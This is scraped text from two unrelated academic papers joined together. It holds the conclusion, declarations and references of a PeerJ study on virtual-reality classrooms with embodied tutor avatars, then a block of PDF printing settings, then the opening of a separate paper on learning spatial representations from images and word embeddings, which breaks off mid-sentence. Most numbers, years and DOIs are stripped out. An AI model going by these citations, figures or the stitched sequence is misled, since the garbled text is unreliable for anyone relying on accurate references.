non-virtual learning, this is only demonstrated in the immediate short-term as the test and outcome measures were administered immediately after the learning experience. for effective distance learning applications, long-term outcomes need to be assessed, perhaps in the realm of a longitudinal study. future work should consider incorporating additional follow-up assessment periods, in order to provide evidence for whether the performance outcomes observed in the ive and the non-virtual classroom are maintained over a longer period of time. in this preliminary study recruitment was restricted to the student population at the university, however it is likely that large differences in learning styles and ability will vary within this population resulting in a large range of scores in all conditions. future studies using a larger sample-size should consider the prior grades of all participants, and use random allocation to minimise the effects of individual differences. additionally, the present study highlights the need for further investigation into the impact of eas in ives to understand the varying results surrounding their impact on learner performance, motivation, and satisfaction. previous work has highlighted the impact of graphical realism on peoples’ perceptions of avatars in virtual environments while engaging in various tasks in various scenarios (tessier et al., ; kang, watt & ala, ; lugrin et al., ). our goal was to assess the importance of a humanoid avatar, not necessarily the physical realisation of said avatar. future work may consider graphical fidelity and realism as a factor in learner motivation, presence, and satisfaction and engagement with the learning experience. a possible trend in the literature is based around the age of participants, with younger participants seemingly more likely to be influenced by the presence of an ea. future research should seek to investigate this theory. fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the present study there was no verbal interaction allowed between participants and the tutor in all learning conditions in order to remove the likelihood of differing levels of social interaction between participants and the tutor becoming a confounding variable. furthermore, the ea was not equipped with any facial animation to replicate changing expression, both of which likely had a negative impact on the perceived realism. future work investigating learner satisfaction, engagement, and motivation should consider introducing eas with changing expressions and allow verbal interaction, such as the ability to ask the tutor questions, as this may better simulate student-tutor relationships and have a greater impact upon perceived co-presence, producing more insightful results regarding the role of ea tutors within ives. it may also reduce the strangeness reported in “discussion” as the avatar’s behaviour is improved. finally, we highlight a novel avenue for future research: whether the influence of an ea on learning outcomes are mediated by their relevance to the learning material itself. in our study, participants studied fabricated information about an alien species, hence the abstract tutor may be more salient in this context, promoting interest in the learning material to a greater extent than the humanoid tutor (maldonado & nass, ). future work will assess the link between learning material and the ea tutor’s appearance, as well as its contextual relevance and form within the ive. conclusions to the best of our knowledge, this pilot study is the first to directly compare informational- learning in a traditional classroom to a virtual replica using immersive vr for groups of participants in a controlled, laboratory setting. our findings suggest that learner performance is equivalent in both learning situations. it remains unclear how the design of the ive might impact learning outcomes, in particular whether the presence and appearance of the virtual tutor plays a role in learning outcomes. we have discussed avenues for future work, building on our preliminary study and exploring other factors which may impact learning performance in ives as well as guidelines and recommendations for how to design future experiments which control for extraneous variables. there are important implications for developers of distance learning applications: by providing ives opposed to video-based applications, it is possible to reduce the issues with current distance learning platforms and achieve comparable performance levels with those who learn in a traditional classroom, making it possible to cater for increasing numbers of students. as academic and corporate education moves towards ives under increasing pressure to meet the demands of growing numbers of students (kauffman, ), the scalability and significant financial incentives they provide while maintaining satisfactory learning outcomes make them an attractive alternative to current video-based distance learning platforms. in addition, the covid- pandemic has also forced institutions to rethink their ability to provide effective blended learning and virtual learning environments for students. ive technology can help to create effective learning environments that are safe for staff and students, and continue to provide high quality learning and teaching. fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding isabel s. fitton’s research is supported in part by the ukri epsrc centre for doctoral training in digital entertainment (cde), ep/l / . daniel j. finnegan thanks the school of computer science & informatics at cardiff university for their continued support. michael j. proulx is a member of the real and virtual environments augmentation labs (reveal) research centre, the ukri centre for the analysis of motion, entertainment research and applications . (ep/t / ), and the ukri centre for doctoral training in art-ai in computer science at the university of bath. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: ukri epsrc centres: ep/l / and ep/t / . school of computer science & informatics at cardiff university. real and virtual environments augmentation labs (reveal) research centre. competing interests the authors declare that they have no competing interests. author contributions � isabel s. fitton conceived and designed the experiments, performed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � daniel j. finnegan conceived and designed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � michael j. proulx conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the university of bath psychology research ethics committee granted approval to carry out this study (approval number - ). data availability the following information was supplied regarding data availability: the raw data is available in the supplemental files. fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references alseid m, rigas d. . three different modes of avatars as virtual lecturers in e-learning interfaces: a comparative usability study. open virtual reality journal ( ): – doi . / x . ashby plant e, baylor al, doerr ce, rosenberg-kima rb. . changing middle-school students’ attitudes and performance regarding engineering with computer-based social models. computers & education ( ): – doi . /j.compedu. . . . atkinson r. . optimizing learning from examples using animated pedagogical agents. journal of educational psychology ( ): – doi . / - . . . . atkinson rk, mayer re, merrill mm. . fostering social agency in multimedia learning: examining the impact of an animated agent’s voice. contemporary educational psychology ( ): – doi . /j.cedpsych. . . . bailenson jn, swinth k, hoyt c, persky s, dimov a, blascovich j. . the independent and interactive effects of embodied-agent appearance and behavior on self-report, cognitive, and behavioral markers of copresence in immersive virtual environments. presence: teleoperators and virtual environments ( ): – doi . / . baylor al. . the design of motivational agents and avatars. educational technology research and development ( ): – doi . /s - - - . baylor al, kim s. . designing nonverbal communication for pedagogical agents: when less is more. computers in human behavior ( ): – doi . /j.chb. . . . baylor al, kim y. . pedagogical agent design: the impact of agent realism, gender, ethnicity, and instructional role. in: lester jc, vicari rm, paraguaçu f, eds. intelligent tutoring systems, lecture notes in computer science. berlin heidelberg: springer, – . baylor al, ryu j. . the effects of image and animation in enhancing pedagogical agent persona. journal of educational computing research ( ): – doi . /v wq-nwgn-jb -fat . baylor amy l. . promoting motivation with virtual agents and avatars: role of visual presence and appearance. philosophical transactions of the royal society b: biological sciences ( ): – doi . /rstb. . . bush m. . a multiple choice test that rewards partial knowledge. journal of further and higher education ( ): – doi . / . caro v, carter b, dagli s, schissler m, millunchick j. . can virtual reality enhance learning: a case study in materials science. in: ieee frontiers in education conference (fie), – . chen s. . research on the application of virtual reality in remote education based on the example of mooc. in: th international conference on service systems and service management (icsssm), – . clow d. . moocs and the funnel of participation. in: proceedings of the third international conference on learning analytics and knowledge, lak ’ , new york: acm, – . crook c, schofield l. . the video lecture. internet and higher education : – doi . /j.iheduc. . . . fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / x http://dx.doi.org/ . /j.compedu. . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /j.cedpsych. . . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /v wq-nwgn-jb -fat http://dx.doi.org/ . /rstb. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.iheduc. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ darves c, oviatt s, coulston r. . the impact of auditory embodiment on animated character design. in: proceedings of the international joint conference on autonomous agents and multi-agent systems, embodied agents workshop. davies p. . there’s no confidence in multiple-choice testing. loughborough university. available at https://repository.lboro.ac.uk/articles/_there_s_no_confidence_in_multiple- choice_testing__/ (accessed november ). didehbani n, allen t, kandalaft m, krawczyk d, chapman s. . virtual reality social cognition training for children with high functioning autism. computers in human behavior : – doi . /j.chb. . . . dienes z. . bayesian versus orthodox statistics: which side are you on? perspectives on psychological science ( ): – doi . / . faul f, erdfelder e, lang a-g, buchner a. . g*power : a flexible statistical power analysis program for the social, behavioral, and biomedical sciences. behavior research methods ( ): – doi . /bf . feng y, chen d, zhao z, chen h, xi p. . the impact of students and tas’ participation on students’ academic performance in mooc. in: proceedings of the ieee/acm international conference on advances in social networks analysis and mining , asonam ’ , new york: acm, – . freina l, ott m. . a literature review on immersive virtual reality in education: state of the art and perspectives. in: elearning and software for education (else)bucharest, . freitas a, paredes j. . understanding the faculty perspectives influencing their innovative practices in moocs/spocs: a case study. international journal of educational technology in higher education ( ): doi . /s - - - . graesser ac, chipman p, haynes bc, olney a. . autotutor: an intelligent tutoring system with mixed-initiative dialogue. ieee transactions on education ( ): – doi . /te. . . greenwald sw, kulik a, kunert a, beck s, fröhlich b, cobb s, parsons s, newbutt n, gouveia c, cook c, snyder a, payne s, holland j, buessing s, fields g, corning w, lee v, xia l, maes p. . technology and applications for collaborative learning in virtual reality. in: making a difference: prioritizing equity and access in cscl, th international conference on computer supported collaborative learning (cscl), – . hasegawa d, uğurlu y, sakuta h. . a human-like embodied agent learning tour guide for e-learning systems. in: ieee global engineering education conference (educon), – . hecke tv. . power study of anova versus kruskal-wallis test. journal of statistics and management systems ( – ): – doi . / . . . heeter c. . being there: the subjective experience of presence. presence: teleoperators and virtual environments ( ): – doi . /pres. . . . . janse e. . time-compressing natural and synthetic speech. in: proceedings of the th international conference on spoken language processing. jarosz a, wiley j. . what are the odds? a practical guide to computing and reporting bayes factors. journal of problem solving ( ): – . johnson wl, rickel j. . steve: an animated pedagogical agent for procedural training in virtual environments. acm sigart bulletin ( – ): – doi . / . . joo yj, so h-j, kim nh. . examination of relationships among students’ self-determination, technology acceptance, satisfaction, and continuance intention to use k-moocs. computers & education : – doi . /j.compedu. . . . fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://repository.lboro.ac.uk/articles/_there_s_no_confidence_in_multiple-choice_testing__/ https://repository.lboro.ac.uk/articles/_there_s_no_confidence_in_multiple-choice_testing__/ http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . / http://dx.doi.org/ . /bf http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /te. . http://dx.doi.org/ . / . . http://dx.doi.org/ . /pres. . . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.compedu. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kang s-h, watt jh, ala sk. . communicators’ perceptions of social presence as a function of avatar realism in small display mobile communication devices. in: proceedings of the st annual hawaii international conference on system sciences (hicss ), . kaplan am, haenlein m. . higher education and the digital revolution: about moocs, spocs, social media, and the cookie monster. business horizons ( ): – doi . /j.bushor. . . . kauffman h. . a review of predictive factors of student success in and satisfaction with online learning—alt open access repository. research in learning technology : doi . /rlt.v . . king wj, ohya j. . the representation of agents: anthropomorphism, agency, and intelligence. in: conference companion on human factors in computing systems, chi ’ , new york: acm, – . korallo l. . use of virtual reality environments to improve the learning of historical chronology. phd thesis. middlesex university, hendon, london, uk. lessick s, kraft m. . facing reality: the growth of virtual reality and health sciences libraries. journal of the medical library association ( ): – doi . /jmla. . . lester jc, stone ba. . increasing believability in animated pedagogical agents. in: proceedings of the first international conference on autonmous agents, new york: association for computing machinery, vol. . lester jc, stone ba, stelling gd. . lifelike pedagogical agents for mixed-initiative problem solving in constructivist learning environments. user modeling and user-adapted interaction ( ): – doi . /a: . lin l, parmar d, babu sv, leonard ae, daily sb, jörg s. . how character customization affects learning in computational thinking. in: proceedings of the acm symposium on applied perception, sap ’ , new york: acm, : – : . lugrin j-l, wiedemann m, bieberstein d, latoschik me. . influence of avatar realism on stressful situation in vr. in: ieee virtual reality (vr), – . madden j, pandita s, schuldt jp, kim b, won as, holmes ng. . ready student one: exploring the predictors of student learning in virtual reality. plos one ( ):e doi . /journal.pone. . maldonado h, nass c. . emotive characters can make learning more productive and enjoyable: it takes two to learn to tango. educational technology ( ): – . martha asd, santoso hb. . the design and impact of the pedagogical agent: a systematic literature review. journal of educators online ( ): . merchant z, goetz et, cifuentes l, keeney-kennicutt w, davis tj. . effectiveness of virtual reality-based instruction on students’ learning outcomes in k- and higher education: a meta- analysis. computers & education : – doi . /j.compedu. . . . misbhauddin m. . vredu: a framework for interactive immersive lectures using virtual reality. in: st saudi computer society national computer conference (ncc), – . mori m. . on the uncanny valley. energy ( ): – . moro c, stromberga z, stirling a. . virtualisation devices for student learning: comparison between desktop-based (oculus rift) and mobile-based (gear vr) virtual reality in medical and health science education. australasian journal of educational technology ( ): doi . /ajet. . fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.bushor. . . http://dx.doi.org/ . /rlt.v . http://dx.doi.org/ . /jmla. . http://dx.doi.org/ . /a: http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.compedu. . . http://dx.doi.org/ . /ajet. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nemer d, o’neill j. . rethinking moocs: the promises for better education in india. international journal of information communication technologies and human development ( ): – . novick d, afravi m, camacho a, rodriguez a, hinojos l. . pedagogical-agent learning companions in a virtual reality educational experience. in: zaphiris p, ioannou a, eds. learning and collaboration technologies. ubiquitous and virtual environments for learning and collaboration, lecture notes in computer science. cham: springer international publishing, – . nowak kl. . the influence of anthropomorphism and agency on social judgment in virtual environments. journal of computer: mediated communication ( ) doi . /j. - . .tb .x. peperkorn hm, diemer j, mühlberger a. . temporal dynamics in the relation between presence and fear in virtual reality. computers in human behavior : – doi . /j.chb. . . . pirker j, lesjak i, parger m, gütl c. . an educational physics laboratory in mobile versus room scale virtual reality: a comparative study. in: auer me, zutin dg, eds. online engineering & internet of things, lecture notes in networks and systems. new york: springer international publishing, – . psotka j. . immersive training systems: virtual reality and education and training. instructional science ( ): – doi . /bf . rajeswaran p, hung n, kesavadas t, vozenilek j, kumar p. . airwayvr: learning endotracheal intubation in virtual reality. in: ieee conference on virtual reality and d user interfaces (vr), – . rosé cp, carlson r, yang d, wen m, resnick l, goldman p, sherer j. . social factors that contribute to attrition in moocs. in: proceedings of the first acm conference on learning @ scale conference—l@s ’ , atlanta: acm press, – . rosenberg-kima rb, baylor al, plant ea, doerr ce. . the importance of interface agent visual presence: voice alone is less effective in impacting young women’s attitudes toward engineering. in: de kort y, ijsselsteijn w, midden c, eggen b, fogg bj, eds. persuasive technology, lecture notes in computer science. berlin heidelberg: springer, – . roussou m, oliver m, slater m. . the virtual playground: an educational virtual reality environment for evaluating interactivity and conceptual learning. virtual reality ( ): – doi . /s - - - . scaife m, rogers y. . informing the design of a virtual environment to support learning in children. international journal of human: computer studies ( ): – doi . /ijhc. . . schönwetter dj, clifton ra, perry rp. . content familiarity: differential impact of effective teaching on student achievement outcomes. research in higher education ( ): – doi . /a: . schrader c, bastiaens t. . learning in educational computer games for novices: the impact of support provision types on virtual presence, cognitive load, and learning outcomes. international review of research in open and distributed learning ( ): – doi . /irrodl.v i . . schut mj, van der stoep n, fabius jh, van der stigchel s. . feature integration is unaffected by saccade landing point, even when saccades land outside of the range of regular oculomotor variance. journal of vision ( ): doi . / . . . fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ijhc. . http://dx.doi.org/ . /a: http://dx.doi.org/ . /irrodl.v i . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ shin d. . empathy and embodied experience in virtual environment: to what extent can virtual reality stimulate empathy and embodied experience? computers in human behavior : – doi . /j.chb. . . . short j, williams e, christie b. . the social psychology of telecommunications. hoboken: john wiley & sons. sitzmann t. . a meta-analytic examination of the instructional effectiveness of computer- based simulation games. personnel psychology ( ): – doi . /j. - . . .x. sneddon j, barlow g, bradley s, brink a, chandy sj, nathwani d. . development and impact of a massive open online course (mooc) for antimicrobial stewardship. journal of antimicrobial chemotherapy ( ): – doi . /jac/dkx . soliman m, guetl c. . intelligent pedagogical agents in immersive virtual learning environments: a review. in: the rd international convention mipro, – . sträfling n, fleischer i, polzer c, leutner d, krämer nc. . teaching learning strategies with a pedagogical agent. journal of media psychology ( ): – doi . / - /a . tessier m-h, gingras c, robitaille n, jackson pl. . toward dynamic pain expressions in avatars: perceived realism and pain level of different action unit orders. computers in human behavior : – doi . /j.chb. . . . tsaramirsis g, buhari sm, al-shammari ko, ghazi s, nazmudeen ms, tsaramirsis k. . towards simulation of the classroom learning experience: virtual reality approach. in: rd international conference on computing for sustainable global development (indiacom), – . wagenmakers e-j, love j, marsman m, jamil t, ly a, verhagen j, selker r, gronau qf, dropmann d, boutin b, meerhoff f, knight p, raj a, van kesteren e-j, van doorn j, Šmíra m, epskamp s, etz a, matzke d, de jong t, van den bergh d, sarafoglou a, steingroever h, derks k, rouder jn, morey rd. . bayesian inference for psychology. part ii: example applications with jasp. psychonomic bulletin & review ( ): – doi . /s - - - . wise a, chang j, duffy t, del valle r. . the effects of teacher social presence on student satisfaction, engagement, and learning. journal of educational computing research ( ): – doi . /v lb- m -rnr -y u . witmer bg, singer mj. . measuring presence in virtual environments: a presence questionnaire. presence: teleoperators and virtual environments ( ): – doi . / . yang d, sinha t, adamson d, penstein rose c. . turn on, tune in, drop out: anticipating student dropouts in massive open online courses. in: proceedings of the nips data-driven education workshop. vol. . fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /jac/dkx http://dx.doi.org/ . / - /a http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /v lb- m -rnr -y u http://dx.doi.org/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. immersive virtual environments and embodied agents for e-learning applications introduction materials and methods analysis and results discussion conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice learning representations specialized in spatial knowledge: leveraging language and vision guillem collell department of computer science ku leuven heverlee, belgium gcollell@kuleuven.be marie-francine moens department of computer science ku leuven heverlee, belgium sien.moens@cs.kuleuven.be abstract spatial understanding is crucial in many real- world problems, yet little progress has been made towards building representations that capture spatial knowledge. here, we move one step forward in this direction and learn such representations by leveraging a task consisting in predicting continuous d spa- tial arrangements of objects given object- relationship-object instances (e.g., “cat under chair”) and a simple neural network model that learns the task from annotated images. we show that the model succeeds in this task and, furthermore, that it is capable of predicting correct spatial arrangements for unseen ob- jects if either cnn features or word embed- dings of the objects are provided. the differ- ences between visual and linguistic features are discussed. next, to evaluate the spatial representations learned in the previous task, we introduce a task and a dataset consisting in a set of crowdsourced human ratings of spatial similarity for object pairs. we find that both cnn (convolutional neural network) features and word embeddings predict human judgments of similarity well and that these vectors can be further specialized in spatial knowledge if we update them when training the model that predicts spatial arrangements of objects. overall, this paper paves the way towards building distributed spatial represen- tations, contributing to the understanding of spatial expressions in language. introduction representing spatial knowledge is instrumental in any task involving text-to-scene conversion such as robot understanding of natural language commands (guadarrama et al., ; moratz and tenbrink, ) or a number of robot navigation tasks. despite recent advances in building specialized representa- tions in domains such as sentiment analysis (tang et al., ), semantic similarity/relatedness (kiela et al., ) or dependency parsing (bansal et al., ), little progress has been made towards build- ing distributed representations (a.k.a. embeddings) specialized in spatial knowledge. intuitively, one may reasonably expect that the more attributes two objects share (e.g., size, func- tionality, etc.), the more likely they are to exhibit similar spatial arrangements with respect to other objects. leveraging this intuition, we foresee that visual and linguistic representations can be spatially informative about unseen objects as they encode features/attributes of objects (collell and moens, ). for instance, without having ever seen an “elephant” before, but only a “horse”, one would probably devise the “elephant” carrying the “hu- man” than otherwise, just by considering their size attribute. similarly, one can infer that a “tablet” and a “book” will show similar spatial patterns (usually on a table, in someone’s hands, etc.) although they barely show any visual resemblance—yet they are similar in size and functionality. in this paper we systematically study how informative visual and lin- guistic features—in the form of convolutional neural network (cnn) features and word embeddings—are about the spatial behavior of objects. an important goal of this work is to learn dis- tributed representations specialized in spatial knowl- edge. as a vehicle to learn spatial representations, transactions of the association for computational linguistics, vol. , pp. – , . action editor: stefan riezler. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. we leverage the task of predicting the d spatial ar- rangement for two objects under a relationship ex- pressed by either a preposition (e.g., “below” or “on”) or a verb (e.g., “riding”, “jumping”, etc.). for that, we make use of images where both objects are annotated with bounding boxes. for instance, in an image depicting (horse, jumping, fence) we reason- ably expect to find the “horse” above the “fence”. to learn the task, we employ a feed forward network that represents objects as continuous (spatial) fea- tures in an embedding layer and guides the learning with a distance-based supervision on the objects’ co- ordinates. we show that the model fares well in this task and that by informing it with either word em- beddings or cnn features it is able to output accu- rate predictions about unseen objects, e.g., predict- ing the spatial arrangement of (man, riding, bike) without having ever been exposed to a “bike” be- fore. this result suggests that the semantic and vi- sual knowledge carried by the visual and linguistic features correlates to a certain extent with the spatial properties of words, thus providing predictive power for unseen objects. to evaluate the quality of the spatial representa- tions learned in the previous task, we introduce a task consisting in a set of , human ratings of spatial similarity between object pairs. it is thus de- sirable for spatial representations that “spatially sim- ilar” objects (i.e., objects that are arranged spatially similar in most situations and relative to other ob- jects) have similar embeddings. in these ratings we show, first, that both cnn features and word em- beddings are good predictors of human judgments, and second, that these vectors can be further spe- cialized in spatial knowledge if we update them by backpropagation when learning the model in the task of predicting spatial arrangements of objects. the rest of the paper is organized as follows. in sect. we review related research. in sect. we describe two spatial tasks and a model. in sect. we describe our experimental setup. in sect. we present and discuss our results. finally, in sect. we summarize our contributions. related work contrary to earlier rule-based approaches to spatial understanding (kruijff et al., ; moratz and ten- brink, ), malinowski and fritz ( ) propose a learning-based method that learns the parameters of “spatial templates” (or regions of acceptability of an object under a spatial relation) using a pool- ing approach. they show improved performance in image retrieval and image annotation (i.e., retriev- ing sentences given a query image) over previous rule-based systems and methods that rely on hand- crafted templates. contrary to us, they restrict to relationships expressed by explicit spatial preposi- tions (e.g., “on” or “below”) while we also consider actions (e.g., “jumping”). furthermore, they do not build spatial representations for objects. other approaches have shown the value of prop- erly integrating spatial information into a variety of tasks. for example, shiang et al. ( ) improve over the state-of-the-art object recognition by lever- aging previous knowledge of object co-occurrences and relative positions of objects—which they mine from text and the web—in order to rank possible object detections. in a similar fashion, lin and parikh ( ) leverage common sense visual knowl- edge (e.g., object locations and co-occurrences) in two tasks: fill-in-the-blank and visual paraphrasing. they compute the likelihood of a scene to identify the most likely answer to multiple-choice textual scene descriptions. in contrast, we focus solely on spatial information rather than semantic plausibility. moreover, our primary target is to build (spatial) rep- resentations. alternatively, elliott and keller ( ) annotate geometric relationships between objects in images (e.g., they add an “on” link between “man” and “bike” in an image of a “man” “riding” a “bike”) to better infer the action present in the image. for instance, if the “man” is next to the bike one can infer that the action “repairing” is more likely than “riding” in this image. accounting for this extra spatial structure allows them to outperform bag-of- features methods in an image captioning task. in contrast with those who restrict to a small domain of actions (e.g., “taking a photo”, “riding”, etc.), our goal is to generalize to any unseen/rare objects and actions by learning from frequent spatial config- urations and objects, and critically, leveraging rep- resentations of objects. recent work (collell et al., ) tackles the research question of whether rel- ative spatial arrangements can be predicted equally well from actions (e.g., “riding”) than from spatial prepositions (e.g., “below”), and how to interpret the learned weights of the network. in contrast, our research questions concern spatial representations. crucially, none of the studies above have consid- ered or attempted to learn distributed spatial repre- sentations of objects, nor studied how much spatial knowledge is contained in visual and linguistic rep- resentations. the existence of quantitative, continuous spatial representations of objects has been formerly dis- cussed, yet to our knowledge, not systematically in- vestigated before. for instance, forbus et al. ( ) conjectured that “there is no purely qualitative, gen- eral purpose representation of spatial properties”, further emphasizing that the quantitative component is strictly necessary. it is also worth commenting on early work aimed at enhancing the understanding of natural spatial language such as the l project (feldman et al., ). in the context of this project, regier ( ) proposed a connectionist model that learns to predict a few spatial prepositions (“above”, “below”, “left”, “right”, “in”, “out”, “on”, and “off”) from low reso- lution videos containing a limited set of toy objects (circle, square, etc.). in contrast, we consider an un- limited vocabulary of real-world objects, and we do not restrict to spatial prepositions but we include ac- tions, as well. hence, regier’s ( ) setting does not seem plausible to deal with actions given that, in contrast to the spatial prepositions that they use, which are mutually exclusive (an object cannot be “above” and simultaneously “below” another ob- ject), actions are not. in particular, actions exhibit large spatial overlap and, therefore, attempt to pre- dict thousands of different 